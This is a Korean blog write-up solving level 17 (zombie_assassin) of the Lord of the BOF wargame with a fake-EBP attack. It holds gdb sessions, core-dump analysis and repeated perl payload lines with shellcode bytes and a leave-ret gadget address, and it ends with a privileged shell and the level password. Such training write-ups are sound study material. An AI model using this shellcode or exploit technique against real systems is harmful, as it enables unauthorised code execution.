좀비 어쎄신.!
소스를 보면.. 저번 문제와 같이 스택,라이브러리 영역을 못쓴다.
거기에 쁠라스로 strcpy 대신 strncpy를 사용하여 RET 위로 못쓴다.
에헤이. RET위로 못쓰니까 생각나는게 Fake EBP 인데.
마침 주석에 FEBP 라고 나와 있네;;
그럼 고민없이 Fake EBP를 써서 문제를 풀어보자.
페이로드를 짜보면
스택을 초기화 시키는 코드가 존재하지 않으므로
그냥 스택 상에 shellcode를 올리도록 하겠다.
페이로드는 이렇게 구성된다.
[shellcode 주소][shellcode] [nop 20] [shellcode주소 -4의 주소] [leave-ret 가젯]
[assassin@localhost assassin]$ cp zombie_assassin zombie_assassim
[assassin@localhost assassin]$ gdb -q zombie_assassim
(gdb) set disassembly-flavor intel
(gdb) disas main
Dump of assembler code for function main:
0x8048440 <main>: push %ebp
0x8048441 <main+1>: mov %ebp,%esp
0x8048443 <main+3>: sub %esp,40
0x8048446 <main+6>: cmp DWORD PTR [%ebp+8],1
0x804844a <main+10>: jg 0x8048463 <main+35>
0x804844c <main+12>: push 0x8048540
0x8048451 <main+17>: call 0x8048354 <printf>
0x8048456 <main+22>: add %esp,4
0x8048459 <main+25>: push 0
0x804845b <main+27>: call 0x8048364 <exit>
0x8048460 <main+32>: add %esp,4
0x8048463 <main+35>: mov %eax,DWORD PTR [%ebp+12]
0x8048466 <main+38>: add %eax,4
0x8048469 <main+41>: mov %edx,DWORD PTR [%eax]
0x804846b <main+43>: add %edx,47
0x804846e <main+46>: cmp BYTE PTR [%edx],0xbf
0x8048471 <main+49>: jne 0x8048490 <main+80>
0x8048473 <main+51>: push 0x804854c
0x8048478 <main+56>: call 0x8048354 <printf>
0x804847d <main+61>: add %esp,4
0x8048480 <main+64>: push 0
0x8048482 <main+66>: call 0x8048364 <exit>
0x8048487 <main+71>: add %esp,4
0x804848a <main+74>: lea %esi,[%esi]
0x8048490 <main+80>: mov %eax,DWORD PTR [%ebp+12]
0x8048493 <main+83>: add %eax,4
0x8048496 <main+86>: mov %edx,DWORD PTR [%eax]
0x8048498 <main+88>: add %edx,47
0x804849b <main+91>: cmp BYTE PTR [%edx],0x40
0x804849e <main+94>: jne 0x80484b7 <main+119>
0x80484a0 <main+96>: push 0x8048561
0x80484a5 <main+101>: call 0x8048354 <printf>
0x80484aa <main+106>: add %esp,4
0x80484ad <main+109>: push 0
0x80484af <main+111>: call 0x8048364 <exit>
0x80484b4 <main+116>: add %esp,4
0x80484b7 <main+119>: push 48
0x80484b9 <main+121>: mov %eax,DWORD PTR [%ebp+12]
0x80484bc <main+124>: add %eax,4
0x80484bf <main+127>: mov %edx,DWORD PTR [%eax]
0x80484c1 <main+129>: push %edx
0x80484c2 <main+130>: lea %eax,[%ebp-40]
0x80484c5 <main+133>: push %eax
0x80484c6 <main+134>: call 0x8048374 <strncpy>
0x80484cb <main+139>: add %esp,12
0x80484ce <main+142>: lea %eax,[%ebp-40]
---Type <return> to continue, or q <return> to quit---
0x80484d1 <main+145>: push %eax
0x80484d2 <main+146>: push 0x804857e
0x80484d7 <main+151>: call 0x8048354 <printf>
0x80484dc <main+156>: add %esp,8
0x80484df <main+159>: leave
0x80484e0 <main+160>: ret
0x80484e1 <main+161>: nop
0x80484e2 <main+162>: nop
0x80484e3 <main+163>: nop
0x80484e4 <main+164>: nop
0x80484e5 <main+165>: nop
0x80484e6 <main+166>: nop
0x80484e7 <main+167>: nop
0x80484e8 <main+168>: nop
0x80484e9 <main+169>: nop
0x80484ea <main+170>: nop
0x80484eb <main+171>: nop
0x80484ec <main+172>: nop
0x80484ed <main+173>: nop
0x80484ee <main+174>: nop
0x80484ef <main+175>: nop
End of assembler dump.
(gdb) b *main+151
Breakpoint 1 at 0x80484d7
(gdb) r `perl -e 'print "\x90"x48'`
Starting program: /home/assassin/zombie_assassim `perl -e 'print "\x90"x48'`
leave-ret 가젯은 0x080484df
[assassin@localhost assassin]$ gdb -q zombie_assassim
(gdb) set disassembly-flavor intel
(gdb) b *main+159
Breakpoint 1 at 0x80484df
(gdb) r aaaaa
Starting program: /home/assassin/zombie_assassim aaaaa
aaaaa
Breakpoint 1, 0x80484df in main ()
(gdb) x/x $esp
0xbffffad0: 0x61616161
buf 시작 주소는 0xbffffad0 란걸 알 수 있다.
어차피 주소가 틀리겠지만.. 일단 넣어보자
[assassin@localhost assassin]$ ./zombie_assassin `perl -e 'print "\xd4\xfa\xff\xbf","\xb8\xf9\xbf\x0f\x40\x50\x31\xc0\x50\xb8\xe0\x8a\x05\x40\x50\xc3","\x90"x20,"\xbc\xfa\xff\xbf","\xdf\x84\x04\x08"'`
喇?몽?P1픐멘?P횖릱릱릱릱릱릱릱릱릱맻?욀?
Segmentation fault
[assassin@localhost assassin]$ ./zombie_assassin `perl -e 'print "\xd4\xfa\xff\xbf","\xb8\xf9\xbf\x0f\x40\x50\x31\xc0\x50\xb8\xe0\x8a\x05\x40\x50\xc3","\x90"x20,"\xbc\xfa\xff\xbf","\xdf\x84\x04\x08"'`
喇?몽?P1픐멘?P횖릱릱릱릱릱릱릱릱릱맻?욀?
Segmentation fault
바로 안뜨는군. 코어덤프를 떠서 확인해보겠음
[assassin@localhost assassin]$ ./zombie_assassim `perl -e 'print "\xc8\xfa\xff\xbf","\xb8\xf9\xbf\x0f\x40\x50\x31\xc0\x50\xb8\xe0\x8a\x05\x40\x50\xc3","\x90"x20,"\xc0\xfa\xff\xbf","\xdf\x84\x04\x08"'`
힐?몽?P1픐멘?P횖릱릱릱릱릱릱릱릱릱맿?욀?
Segmentation fault (core dumped)
[assassin@localhost assassin]$ gdb zombie_assassim core
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
Core was generated by `./zombie_assassim 힐?몽?P1픐멘?P횖릱릱릱릱릱릱릱릱릱맿?욀'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...PuTTYdone.
Reading symbols from /lib/ld-linux.so.2...done.
#0 0x90909090 in ?? ()
(gdb) bt
#0 0x90909090 in ?? ()
Cannot access memory at address 0xc3504005
(gdb) info reg
eax 0x32 50
ecx 0x400 1024
edx 0x40106980 1074817408
ebx 0x401081ec 1074823660
esp 0xbffffac8 -1073743160
ebp 0xc3504005 -1018150907
esi 0x4000ae60 1073786464
edi 0xbffffb24 -1073743068
eip 0x90909090 -1869574000
eflags 0x10292 66194
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x2b 43
gs 0x2b 43
cwd 0x0 0
swd 0x0 0
twd 0x0 0
fip 0x0 0
fcs 0x0 0
fopo 0x0 0
fos 0x0 0
(gdb) quit
[assassin@localhost assassin]$
[assassin@localhost assassin]$
[assassin@localhost assassin]$ ./zombie_assassim `perl -e 'print "\xcc\xfa\xff\xbf","\xb8\xf9\xbf\x0f\x40\x50\x31\xc0\x50\xb8\xe0\x8a\x05\x40\x50\xc3","\x90"x20,"\xc4\xfa\xff\xbf","\xdf\x84\x04\x08"'`
屆?몽?P1픐멘?P횖릱릱릱릱릱릱릱릱릱먅?욀?
Segmentation fault (core dumped)
[assassin@localhost assassin]$ gdb zombie_assassim core
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
Core was generated by `./zombie_assassim 屆?몽?P1픐멘?P횖릱릱릱릱릱릱릱릱릱먅?욀'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...PuTTYdone.
Reading symbols from /lib/ld-linux.so.2...done.
#0 0x90909090 in ?? ()
(gdb) bt
#0 0x90909090 in ?? ()
Cannot access memory at address 0x90909090
(gdb) quit
[assassin@localhost assassin]$ rm core
[assassin@localhost assassin]$ ./zombie_assassim `perl -e 'print "\xcc\xfa\xff\xbf","\xb8\xf9\xbf\x0f\x40\x50\x31\xc0\x50\xb8\xe0\x8a\x05\x40\x50\xc3","\x90"x20,"\xc4\xfa\xff\xbf","\xdf\x84\x04\x08"'`
屆?몽?P1픐멘?P횖릱릱릱릱릱릱릱릱릱먅?욀?
Segmentation fault (core dumped)
[assassin@localhost assassin]$ gdb zombie_assassim core
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
Core was generated by `./zombie_assassim 屆?몽?P1픐멘?P횖릱릱릱릱릱릱릱릱릱먅?욀'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...PuTTYdone.
Reading symbols from /lib/ld-linux.so.2...done.
#0 0x90909090 in ?? ()
(gdb) bt
#0 0x90909090 in ?? ()
Cannot access memory at address 0x90909090
(gdb)
#0 0x90909090 in ?? ()
Cannot access memory at address 0x90909090
(gdb)
#0 0x90909090 in ?? ()
Cannot access memory at address 0x90909090
(gdb) x/64x $esp-64
0xbffffa8c: 0x40066070 0x40106980 0x0804857e 0xbffffab0
0xbffffa9c: 0x401081ec 0xbffffad8 0x080484dc 0x0804857e
0xbffffaac: 0xbffffab0 0xbffffacc 0x0fbff9b8 0xc0315040
0xbffffabc: 0x8ae0b850 0xc3504005 0x90909090 0x90909090
0xbffffacc: 0x90909090 0x90909090 0x90909090 0xbffffac4
0xbffffadc: 0x080484df 0x00000002 0xbffffb24 0xbffffb30
0xbffffaec: 0x40013868 0x00000002 0x08048390 0x00000000
0xbffffafc: 0x080483b1 0x08048440 0x00000002 0xbffffb24
0xbffffb0c: 0x080482e4 0x0804851c 0x4000ae60 0xbffffb1c
0xbffffb1c: 0x40013e90 0x00000002 0xbffffc16 0xbffffc28
0xbffffb2c: 0x00000000 0xbffffc59 0xbffffc6c 0xbffffc84
0xbffffb3c: 0xbffffca3 0xbffffcc5 0xbffffcd3 0xbffffe96
0xbffffb4c: 0xbffffeb5 0xbffffed3 0xbffffee8 0xbfffff08
0xbffffb5c: 0xbfffff13 0xbfffff24 0xbfffff2c 0xbfffff36
0xbffffb6c: 0xbfffff46 0xbfffff54 0xbfffff62 0xbfffff73
0xbffffb7c: 0xbfffff7e 0xbfffff92 0xbfffffd6 0x00000000
(gdb) quit
[assassin@localhost assassin]$ ./zombie_assassin `perl -e 'print "\xa4\xfa\xff\xbf","\xb8\xf9\xbf\x0f\x40\x50\x31\xc0\x50\xb8\xe0\x8a\x05\x40\x50\xc3","\x90"x20,"\x9c\xfa\xff\xbf","\xdf\x84\x04\x08"'`
ㆊ?몽?P1픐멘?P횖릱릱릱릱릱릱릱릱릱맂?욀?
Segmentation fault
[assassin@localhost assassin]$ ./zombie_assassin `perl -e 'print "\xa4\xfa\xff\xbf","\xb8\xf9\xbf\x0f\x40\x50\x31\xc0\x50\xb8\xe0\x8a\x05\x40\x50\xc3","\x90"x20,"\x9c\xfa\xff\xbf","\xdf\x84\x04\x08"'`
ㆊ?몽?P1픐멘?P횖릱릱릱릱릱릱릱릱릱맂?욀?
Segmentation fault
[assassin@localhost assassin]$ rm core
[assassin@localhost assassin]$ ./zombie_assassim `perl -e 'print "\xa4\xfa\xff\xbf","\xb8\xf9\xbf\x0f\x40\x50\x31\xc0\x50\xb8\xe0\x8a\x05\x40\x50\xc3","\x90"x20,"\x9c\xfa\xff\xbf","\xdf\x84\x04\x08"'`
ㆊ?몽?P1픐멘?P횖릱릱릱릱릱릱릱릱릱맂?욀?
Segmentation fault (core dumped)
[assassin@localhost assassin]$ gdb zombie_assassim core
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
Core was generated by `./zombie_assassim ㆊ?몽?P1픐멘?P횖릱릱릱릱릱릱릱릱릱맂?욀'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...PuTTYdone.
Reading symbols from /lib/ld-linux.so.2...done.
#0 0xbffffad9 in ?? ()
(gdb) x/64x $esp-64
0xbffffa60: 0x40021df0 0x401088c0 0x4002982c 0x40021df0
0xbffffa70: 0xbffffaa0 0x4000a970 0xbffffc58 0xbffffadf
0xbffffa80: 0x4005d920 0x400143e0 0xbffffaa0 0x40066070
0xbffffa90: 0x40106980 0x0804857e 0xbffffab0 0x401081ec
0xbffffaa0: 0x00000292 0x080484dc 0x0804857e 0xbffffab0
0xbffffab0: 0xbffffaa4 0x0fbff9b8 0xc0315040 0x8ae0b850
0xbffffac0: 0xc3504005 0x90909090 0x90909090 0x90909090
0xbffffad0: 0x90909090 0x90909090 0xbffffa9c 0x080484df
0xbffffae0: 0x00000002 0xbffffb24 0xbffffb30 0x40013868
0xbffffaf0: 0x00000002 0x08048390 0x00000000 0x080483b1
0xbffffb00: 0x08048440 0x00000002 0xbffffb24 0x080482e4
0xbffffb10: 0x0804851c 0x4000ae60 0xbffffb1c 0x40013e90
0xbffffb20: 0x00000002 0xbffffc16 0xbffffc28 0x00000000
0xbffffb30: 0xbffffc59 0xbffffc6c 0xbffffc84 0xbffffca3
0xbffffb40: 0xbffffcc5 0xbffffcd3 0xbffffe96 0xbffffeb5
0xbffffb50: 0xbffffed3 0xbffffee8 0xbfffff08 0xbfffff13
(gdb) quit
[assassin@localhost assassin]$ ./zombie_assassin `perl -e 'print "\xb4\xfa\xff\xbf","\xb8\xf9\xbf\x0f\x40\x50\x31\xc0\x50\xb8\xe0\x8a\x05\x40\x50\xc3","\x90"x20,"\xac\xfa\xff\xbf","\xdf\x84\x04\x08"'`
덜?몽?P1픐멘?P횖릱릱릱릱릱릱릱릱릱맟?욀?
bash$ id
uid=515(assassin) gid=515(assassin) euid=516(zombie_assassin) egid=516(zombie_assassin) groups=515(assassin)
bash$ my-pass
euid = 516
no place to hide
bash$
주소가 자꾸 바껴서 애좀 먹었다.
'IT 그리고 정보보안 > Write-up' 카테고리의 다른 글
| LOB Level 18 (succubus) (0) | 2021.04.12 |
|---|---|
| LOB Level 17 (zombie_assassin) (0) | 2021.04.12 |
| LOB Level 15 (giant) (0) | 2021.04.12 |
| LOB Level 14 (bugbear) (0) | 2021.04.12 |
| LOB Level 13 (darkknight) (0) | 2021.04.12 |